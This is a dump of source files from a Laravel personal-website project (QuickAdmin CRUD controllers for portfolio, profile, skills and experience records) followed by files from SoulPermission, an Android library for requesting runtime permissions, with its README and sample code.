* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$portfolio1 = Portfolio1::with("catportfolio")->get();
return view('admin.portfolio1.index', compact('portfolio1'));
}
/**
* Show the form for creating a new portfolio1
*
* @return \Illuminate\View\View
*/
public function create()
{
$catportfolio = Catportfolio::pluck("id", "id")->prepend('Please select', null);
return view('admin.portfolio1.create', compact("catportfolio"));
}
/**
* Store a newly created portfolio1 in storage.
*
* @param CreatePortfolio1Request|Request $request
*/
public function store(CreatePortfolio1Request $request)
{
$request = $this->saveFiles($request);
Portfolio1::create($request->all());
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Show the form for editing the specified portfolio1.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$portfolio1 = Portfolio1::find($id);
$catportfolio = Catportfolio::pluck("id", "id")->prepend('Please select', null);
return view('admin.portfolio1.edit', compact('portfolio1', "catportfolio"));
}
/**
* Update the specified portfolio1 in storage.
* @param UpdatePortfolio1Request|Request $request
*
* @param int $id
*/
public function update($id, UpdatePortfolio1Request $request)
{
$portfolio1 = Portfolio1::findOrFail($id);
$request = $this->saveFiles($request);
$portfolio1->update($request->all());
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Remove the specified portfolio1 from storage.
*
* @param int $id
*/
public function destroy($id)
{
Portfolio1::destroy($id);
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Portfolio1::destroy($toDelete);
} else {
Portfolio1::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Http\Requests;
use App\Bcat;
use App\Blog1;
use App\User;
class CategoryController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
//
abort(404);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
//
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
//
$bcat1 = Bcat::find($id);
// find() returns null for an unknown id, so guard before using it
if (!$bcat1) {
abort(404);
}
$blog = Blog1::with("bcat")->with("user")->where('bcat_id', $id)->get()->sortByDesc("id");
$blogsb = Blog1::with("bcat")->with("user")->get()->sortByDesc("id");
$bcat = Bcat::all();
$title = $bcat1->category;
return view('front-end.blog', compact('bcat', 'blog', 'blogsb'))->with('title', $title);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
//
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
//
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep># fajarsuryanto.com
Source for my personal website using [Laravel 5.3](http://laravel.com/docs/5.3/).
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Knowledge;
use App\Http\Requests\CreateKnowledgeRequest;
use App\Http\Requests\UpdateKnowledgeRequest;
use Illuminate\Http\Request;
use App\User;
class KnowledgeController extends Controller {
/**
* Display a listing of knowledge
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$knowledge = Knowledge::with("user")->get();
return view('admin.knowledge.index', compact('knowledge'));
}
/**
* Show the form for creating a new knowledge
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.knowledge.create', compact("user"));
}
/**
* Store a newly created knowledge in storage.
*
* @param CreateKnowledgeRequest|Request $request
*/
public function store(CreateKnowledgeRequest $request)
{
Knowledge::create($request->all());
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Show the form for editing the specified knowledge.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$knowledge = Knowledge::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.knowledge.edit', compact('knowledge', "user"));
}
/**
* Update the specified knowledge in storage.
* @param UpdateKnowledgeRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateKnowledgeRequest $request)
{
$knowledge = Knowledge::findOrFail($id);
$knowledge->update($request->all());
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Remove the specified knowledge from storage.
*
* @param int $id
*/
public function destroy($id)
{
Knowledge::destroy($id);
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Knowledge::destroy($toDelete);
} else {
Knowledge::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Profile;
use App\Http\Requests\CreateProfileRequest;
use App\Http\Requests\UpdateProfileRequest;
use Illuminate\Http\Request;
use App\Http\Controllers\Traits\FileUploadTrait;
use App\User;
class ProfileController extends Controller {
use FileUploadTrait;
/**
* Display a listing of profile
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$profile = Profile::with("user")->get();
return view('admin.profile.index', compact('profile'));
}
/**
* Show the form for creating a new profile
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.profile.create', compact("user"));
}
/**
* Store a newly created profile in storage.
*
* @param CreateProfileRequest|Request $request
*/
public function store(CreateProfileRequest $request)
{
$request = $this->saveFiles($request);
Profile::create($request->all());
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Show the form for editing the specified profile.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$profile = Profile::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.profile.edit', compact('profile', "user"));
}
/**
* Update the specified profile in storage.
* @param UpdateProfileRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateProfileRequest $request)
{
$profile = Profile::findOrFail($id);
$request = $this->saveFiles($request);
$profile->update($request->all());
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Remove the specified profile from storage.
*
* @param int $id
*/
public function destroy($id)
{
Profile::destroy($id);
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Profile::destroy($toDelete);
} else {
Profile::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.profile.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skillpro;
use App\Http\Requests\CreateSkillproRequest;
use App\Http\Requests\UpdateSkillproRequest;
use Illuminate\Http\Request;
use App\User;
class SkillproController extends Controller {
/**
* Display a listing of skillpro
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skillpro = Skillpro::with("user")->get();
return view('admin.skillpro.index', compact('skillpro'));
}
/**
* Show the form for creating a new skillpro
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skillpro.create', compact("user"));
}
/**
* Store a newly created skillpro in storage.
*
* @param CreateSkillproRequest|Request $request
*/
public function store(CreateSkillproRequest $request)
{
Skillpro::create($request->all());
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Show the form for editing the specified skillpro.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skillpro = Skillpro::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skillpro.edit', compact('skillpro', "user"));
}
/**
* Update the specified skillpro in storage.
* @param UpdateSkillproRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkillproRequest $request)
{
$skillpro = Skillpro::findOrFail($id);
$skillpro->update($request->all());
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Remove the specified skillpro from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skillpro::destroy($id);
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skillpro::destroy($toDelete);
} else {
Skillpro::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Experience;
use App\Http\Requests\CreateExperienceRequest;
use App\Http\Requests\UpdateExperienceRequest;
use Illuminate\Http\Request;
use App\User;
class ExperienceController extends Controller {
/**
* Display a listing of experience
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$experience = Experience::with("user")->get();
return view('admin.experience.index', compact('experience'));
}
/**
* Show the form for creating a new experience
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.experience.create', compact("user"));
}
/**
* Store a newly created experience in storage.
*
* @param CreateExperienceRequest|Request $request
*/
public function store(CreateExperienceRequest $request)
{
Experience::create($request->all());
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Show the form for editing the specified experience.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$experience = Experience::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.experience.edit', compact('experience', "user"));
}
/**
* Update the specified experience in storage.
* @param UpdateExperienceRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateExperienceRequest $request)
{
$experience = Experience::findOrFail($id);
$experience->update($request->all());
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Remove the specified experience from storage.
*
* @param int $id
*/
public function destroy($id)
{
Experience::destroy($id);
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Experience::destroy($toDelete);
} else {
Experience::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.experience.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Skilllang extends Model {
protected $table = 'skilllang';
protected $fillable = [
'user_id',
'skill',
'skill_range'
];
public static $skill_range = ["1" => "1", "2" => "2", "3" => "3", "4" => "4", "5" => "5"];
public static function boot()
{
parent::boot();
Skilllang::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}
| 2747a9967c0724d38bcf71fd6d374221d5fe4b91 | ["Markdown", "PHP"] | 23 | PHP | fajars87/fajarsuryanto.com | 1585c9b6b9640cbc9c2e33638a3ef9433d62bd8c | 268e02e9ca1cc40ea3c01a5a209fd96806fe12c9 | refs/heads/master |
<file_sep>package com.qw.sample.utils;
import android.Manifest;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.provider.ContactsContract;
import android.telephony.TelephonyManager;
import android.widget.Toast;
import com.qw.sample.adapter.CheckPermissionAdapter;
import com.qw.sample.adapter.CheckPermissionWithRationaleAdapter;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
/**
* @author cd5160866
*/
public class UtilsWithPermission {
/**
* Make a phone call to the given number
*/
public static void makeCall(final Context context, final String phoneNumber) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.CALL_PHONE,
new CheckPermissionWithRationaleAdapter("如果你拒绝了权限,你将无法拨打电话,请点击授予权限",
new Runnable() {
@Override
public void run() {
//retry
makeCall(context, phoneNumber);
}
}) {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
Intent intent = new Intent(Intent.ACTION_CALL);
Uri data = Uri.parse("tel:" + phoneNumber);
intent.setData(data);
if (!(context instanceof Activity)) {
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
}
context.startActivity(intent);
}
});
}
/**
* 选择联系人
*/
public static void chooseContact(final Activity activity, final int requestCode) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckPermissionAdapter() {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
activity.startActivityForResult(new Intent(Intent.ACTION_PICK, ContactsContract.Contacts.CONTENT_URI), requestCode);
}
});
}
/**
* Read the phone state.
* READ_PHONE_STATE and CALL_PHONE belong to the same permission group; once either is granted, the other needs no separate request.
*/
public static void readPhoneStatus() {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_PHONE_STATE, new CheckPermissionAdapter() {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
Context context = SoulPermission.getInstance().getContext();
TelephonyManager tm = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
if (tm == null) {
return;
}
Toast.makeText(context, "phone " + tm.getLine1Number() + "\nime " + tm.getDeviceId() + "\nsimSerialNumber " + tm.getSimSerialNumber(), Toast.LENGTH_SHORT)
.show();
}
});
}
}
<file_sep>package com.qw.sample.adapter;
import android.app.Activity;
import android.content.DialogInterface;
import androidx.appcompat.app.AlertDialog;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
/**
* @author cd5160866
*/
public abstract class CheckPermissionWithRationaleAdapter implements CheckRequestPermissionListener {
private String rationaleMessage;
private Runnable retryRunnable;
/**
* @param rationaleMessage shown when the user denies the dialog for the first time; explain, per permission, why it is needed
* @param retryRunnable runnable executed when the user agrees to re-authorize, i.e. it re-runs the original method
*/
public CheckPermissionWithRationaleAdapter(String rationaleMessage, Runnable retryRunnable) {
this.rationaleMessage = rationaleMessage;
this.retryRunnable = retryRunnable;
}
@Override
public void onPermissionDenied(Permission permission) {
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null == activity) {
return;
}
//the flow shown in the green box of the README diagram
//the user denied the permission once without ticking "Don't ask again", so shouldRationale() is true; tell the user why the permission is needed
if (permission.shouldRationale()) {
new AlertDialog.Builder(activity)
.setTitle("Notice")
.setMessage(rationaleMessage)
.setPositiveButton("Grant", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
//after the user confirms, re-run the original request flow
retryRunnable.run();
}
}).create().show();
} else {
//at this point any request is denied immediately; the user has to enable the permission manually, so show a dialog guiding them to the settings page
String permissionDesc = permission.getPermissionNameDesc();
new AlertDialog.Builder(activity)
.setTitle("Notice")
.setMessage(permissionDesc + " is unavailable. Please go to Settings -> Permission Management and enable " + permissionDesc + ".")
.setPositiveButton("Go to Settings", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
//jump to the app settings page
SoulPermission.getInstance().goApplicationSettings();
}
}).create().show();
}
}
}
<file_sep>package com.qw.soul.permission.bean;
/**
* @author cd5160866
*/
public enum Special {
/**
* Notification permission
*/
NOTIFICATION,
/**
* System alert window (overlay)
*/
SYSTEM_ALERT,
/**
* Allow installing apps from unknown sources
*/
UNKNOWN_APP_SOURCES,
/**
* Modify system settings
*/
WRITE_SETTINGS
}
<file_sep>package com.qw.soul.permission.exception;
/**
* @author cd5160866
*/
public class InitException extends IllegalStateException {
public InitException() {
super("auto init failed ,you need invoke SoulPermission.init() in your application");
}
}
<file_sep>package com.qw.soul.permission.bean;
/**
* This class exists only to make the parameters clearer.
*
* @author cd5160866
*/
public class Permissions {
private Permission[] permissions;
public static Permissions build(String... permissions) {
return new Permissions(permissions);
}
public static Permissions build(Permission... permissions) {
return new Permissions(permissions);
}
private Permissions() {
}
private Permissions(String[] permissions) {
this.permissions = new Permission[permissions.length];
for (int i = 0; i < permissions.length; i++) {
this.permissions[i] = Permission.getDefault(permissions[i]);
}
}
private Permissions(Permission[] permissions) {
this.permissions = permissions;
}
public Permission[] getPermissions() {
return permissions;
}
public String[] getPermissionsString() {
String[] result = new String[permissions.length];
for (int i = 0; i < permissions.length; i++) {
result[i] = permissions[i].permissionName;
}
return result;
}
}
<file_sep>package com.qw.sample.guide;
import android.graphics.Color;
import android.os.Bundle;
import androidx.fragment.app.FragmentManager;
import androidx.fragment.app.FragmentPagerAdapter;
import androidx.fragment.app.FragmentStatePagerAdapter;
import androidx.viewpager.widget.ViewPager;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import com.qw.sample.R;
import com.qw.sample.guide.fragment.PagerItemFragment;
import java.util.Arrays;
import java.util.List;
public class WithPagerFragmentActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_with_fragment);
findViewById(R.id.FragmentPagerAdapter).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ViewPager viewPager = findViewById(R.id.vp);
viewPager.setAdapter(new MyFragmentAdapter(getSupportFragmentManager()));
}
});
findViewById(R.id.FragmentStatePagerAdapter).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ViewPager viewPager = findViewById(R.id.vp);
viewPager.setAdapter(new MyFragmentStateAdapter(getSupportFragmentManager()));
}
});
}
class MyFragmentStateAdapter extends FragmentStatePagerAdapter {
private final static int TAB_COUNT = 3;
private List<Integer> listData = Arrays.asList(Color.RED, Color.GREEN, Color.BLUE);
MyFragmentStateAdapter(FragmentManager fm) {
super(fm);
}
@Override
public PagerItemFragment getItem(int position) {
return PagerItemFragment.get(listData.get(position));
}
@Override
public int getCount() {
return TAB_COUNT;
}
}
class MyFragmentAdapter extends FragmentPagerAdapter {
private final static int TAB_COUNT = 3;
private List<Integer> listData = Arrays.asList(Color.RED, Color.GREEN, Color.BLUE);
MyFragmentAdapter(FragmentManager fm) {
super(fm);
}
@Override
public PagerItemFragment getItem(int position) {
return PagerItemFragment.get(listData.get(position));
}
@Override
public int getCount() {
return TAB_COUNT;
}
}
}
<file_sep>package com.qw.sample;
import android.content.Intent;
import android.os.Bundle;
import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import android.widget.Toast;
import com.qw.sample.utils.Utils;
import com.qw.sample.utils.UtilsWithPermission;
public class AfterActivity extends AppCompatActivity {
private static final int REQUEST_CODE_CONTACT = 1;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_example);
findViewById(R.id.bt_call).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
UtilsWithPermission.makeCall(AfterActivity.this, "10086");
// makeCall();
}
});
findViewById(R.id.bt_choose_contact).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
chooseContact();
}
});
findViewById(R.id.bt_read_phone_status).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
UtilsWithPermission.readPhoneStatus();
}
});
}
// public void makeCall() {
// SoulPermission.getInstance()
// .checkAndRequestPermission(Manifest.permission.CALL_PHONE, new CheckRequestPermissionListener() {
// @Override
// public void onPermissionOk(Permission permission) {
// Utils.makeCall(AfterActivity.this, "10086");
// }
//
// @Override
// public void onPermissionDenied(Permission permission) {
// //the flow shown in the green box of the README diagram
// //the user denied the permission once without ticking "Don't ask again", so this value is true; tell the user why the permission is needed
// if (permission.shouldRationale) {
// new AlertDialog.Builder(AfterActivity.this)
// .setTitle("Notice")
// .setMessage("If you deny this permission you will not be able to make calls; please tap Grant")
// .setPositiveButton("Grant", new DialogInterface.OnClickListener() {
// @Override
// public void onClick(DialogInterface dialogInterface, int i) {
// //after the user confirms, re-run the original request flow
// makeCall();
// }
// }).create().show();
// } else {
// Toast.makeText(AfterActivity.this, "Call permission was denied this time; open the settings page to grant it manually, or retry the request", Toast.LENGTH_SHORT).show();
// }
// }
// });
// }
public void chooseContact() {
UtilsWithPermission.chooseContact(AfterActivity.this, REQUEST_CODE_CONTACT);
}
@Override
protected void onActivityResult(int requestCode, int resultCode, @Nullable final Intent data) {
super.onActivityResult(requestCode, resultCode, data);
if (resultCode == RESULT_OK) {
switch (requestCode) {
case REQUEST_CODE_CONTACT:
Utils.onGetChooseContactData(AfterActivity.this, data, new Utils.ReadContactListener() {
@Override
public void onSuccess(Utils.ContactInfo contactInfo) {
Toast.makeText(AfterActivity.this, contactInfo.toString(), Toast.LENGTH_SHORT).show();
}
@Override
public void onFailed() {
}
});
break;
default:
break;
}
}
}
}
<file_sep>include ':soulpermission', ':sample'
<file_sep># SoulPermission
[Latest version on Bintray](https://bintray.com/beta/#/soulqw/maven/soulpermission?tab=overview)
[License: Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
#### A better solution for Android permission handling:
- Method-level permission handling that decouples Activity and Fragment; no more Context plumbing and no onRequestPermissionsResult callbacks
- Version checks are handled internally: one line of code covers the whole permission flow, callers write no adaptation code, giving true "request at the moment of use" runtime permissions
- Low integration cost, minimal code changes, zero intrusion; only a single line of Gradle configuration is needed
- Supports requesting several permissions at once
- Supports checking and requesting special permissions (NOTIFICATION [notifications], SYSTEM_ALERT [app overlay windows], UNKNOWN_APP_SOURCES [installing apps from unknown sources], WRITE_SETTINGS [writing system settings])
- Supports jumping to the system permission settings page
- Supports a debug mode
## Installation:
```gradle
dependencies {
implementation 'com.github.soulqw:SoulPermission:1.3.1'
}
```
If your app has not yet migrated to AndroidX:
```gradle
dependencies {
implementation 'com.qw:soulpermission:1.2.2'
}
```
- 1.2.2 is the last release that supports the support-28 libraries and is no longer maintained; new features are only iterated on top of 1.3.0 (code branch master_old)
- The JCenter artifacts will eventually stop being downloadable, so migrating to AndroidX as soon as possible is recommended in order to keep receiving the latest updates
## Usage:
#### Basic usage:
- One call handles the version check, permission check, request, and follow-up actions:
```java
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.ACCESS_FINE_LOCATION,
//if you want to do nothing or don't need all the callbacks you may use SimplePermissionAdapter instead
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
"\n is ok , you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
});
```
- You can also request several permissions in one call
```java
SoulPermission.getInstance().checkAndRequestPermissions(
Permissions.build(Manifest.permission.CAMERA, Manifest.permission.WRITE_EXTERNAL_STORAGE),
//if you want do noting or no need all the callbacks you may use SimplePermissionsAdapter instead
new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
Toast.makeText(ApiGuideActivity.this, allPermissions.length + "permissions is ok" +
" \n you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
Toast.makeText(ApiGuideActivity.this, refusedPermissions[0].toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
});
```
- Handling the shouldShowRequestPermissionRationale case
```java
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
"\n is ok , you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
// see CheckPermissionWithRationaleAdapter
if (permission.shouldRationale()) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n you should show a explain for user then retry ", Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
}
});
```
- Check a single permission
```java
//you can also use checkPermissions() for a series of permissions
Permission checkResult = SoulPermission.getInstance().checkSinglePermission(Manifest.permission.ACCESS_FINE_LOCATION);
```
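- Note that `checkSinglePermission` may return `null` when no top Activity is available (e.g. the app is in the background - see `getTopActivity`), so guard the result before use; a minimal sketch:
```java
Permission checkResult = SoulPermission.getInstance().checkSinglePermission(Manifest.permission.ACCESS_FINE_LOCATION);
if (checkResult != null && checkResult.isGranted()) {
    // safe to run the location-dependent work here
}
```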
- Check a special permission [notifications]
```java
boolean checkResult = SoulPermission.getInstance().checkSpecialPermission(Special.NOTIFICATION);
```
- Check and request a special permission [installing unknown-source apps]
```java
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.UNKNOWN_APP_SOURCES, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Toast.makeText(ApiGuideActivity.this, "install unKnown app is enable now", Toast.LENGTH_SHORT).show();
}
@Override
public void onDenied(Special permission) {
Toast.makeText(ApiGuideActivity.this, "install unKnown app is disable yet", Toast.LENGTH_SHORT).show();
}
});
```
- Jump to the application settings page
```java
SoulPermission.getInstance().goApplicationSettings(new GoAppDetailCallBack() {
@Override
public void onBackFromAppDetail(Intent data) {
//if you need to know when back from app detail
Utils.showMessage(view, "back from go appDetail");
}
});
```
- Skip the legacy permission system (on old systems, permissions are then treated as granted)
```java
SoulPermission.skipOldRom(true);
```
- Enable debug mode (to see log output)
```java
SoulPermission.setDebug(true);
```
#### Notes:
- The minimum supported version is Android 4.0 (API level 14)
- SoulPermission initializes itself automatically through a ContentProvider. If your project uses a framework that replaces the Application and may therefore break this auto-initialization (e.g. Tinker, Tencent Legu), simply call init manually in your Application class (with debug enabled you can see the error logs and related toasts).
```java
//invoke init in your application when auto init failed
public class SimpleApplication extends Application {
@Override
public void onCreate() {
super.onCreate();
        // not necessary in most cases - only needed when auto-init fails
SoulPermission.init(this);
}
}
```
- If you need to request a permission when a page is created, do it in onCreate(); do not call it from onResume(), otherwise the flow loops forever while the permission has not yet been granted dynamically - see the sketch below.
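- For example, a minimal sketch (the `LocationActivity` and its layout are hypothetical) of requesting a permission when a page is created:
```java
public class LocationActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_location);
        // request once, when the page is created
        SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.ACCESS_FINE_LOCATION,
                new CheckRequestPermissionListener() {
                    @Override
                    public void onPermissionOk(Permission permission) {
                        // the permission is granted - start the location-dependent work here
                    }

                    @Override
                    public void onPermissionDenied(Permission permission) {
                        // degrade gracefully; do not retry from onResume()
                    }
                });
    }
}
```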
### Screenshot:


- for common Permission

- for Special Permission

### More Detail:
#### [How it works and best-practice examples](https://blog.csdn.net/u014626094/article/details/89438614)
<file_sep>package com.qw.soul.permission.request;
import android.annotation.TargetApi;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import com.qw.soul.permission.bean.Special;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.RequestPermissionListener;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
import static android.os.Build.VERSION_CODES.M;
/**
* @author cd5160866
*/
public interface IPermissionActions {
    /**
     * Request permissions
     *
     * @param permissions the permissions
     * @param listener    the callback
     */
@TargetApi(M)
void requestPermissions(String[] permissions, RequestPermissionListener listener);
    /**
     * Request a special permission
     *
     * @param permission the special permission
     * @param listener   the callback
     */
void requestSpecialPermission(Special permission, SpecialPermissionListener listener);
    /**
     * Go to the app detail page
     *
     * @param callBack the callback
     */
void goAppDetail(@Nullable GoAppDetailCallBack callBack);
}
<file_sep>package com.qw.sample;
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import com.qw.sample.guide.ApiGuideActivity;
import com.qw.sample.guide.ApiGuideAppComponentActivity;
import com.qw.sample.guide.WithPagerFragmentActivity;
import com.qw.sample.guide.fragment.ContainerActivity;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
}
public void before(View view) {
startActivity(new Intent(MainActivity.this, BeforeActivity.class));
}
public void after(View view) {
startActivity(new Intent(MainActivity.this, AfterActivity.class));
}
public void apiGuideActivity(View view) {
startActivity(new Intent(MainActivity.this, ApiGuideActivity.class));
}
public void apiGuideAppComponentActivity(View view) {
startActivity(new Intent(MainActivity.this, ApiGuideAppComponentActivity.class));
}
public void fragment(View view) {
ContainerActivity.start(this, false);
}
public void supportFragment(View view) {
ContainerActivity.start(this, true);
}
public void fragmentWithViewPager(View view) {
startActivity(new Intent(MainActivity.this, WithPagerFragmentActivity.class));
}
}
<file_sep>package com.qw.soul.permission;
import android.app.Activity;
import android.app.Application;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.Handler;
import android.os.Looper;
import androidx.annotation.CheckResult;
import androidx.annotation.MainThread;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.app.ActivityCompat;
import android.util.Log;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.bean.Permissions;
import com.qw.soul.permission.bean.Special;
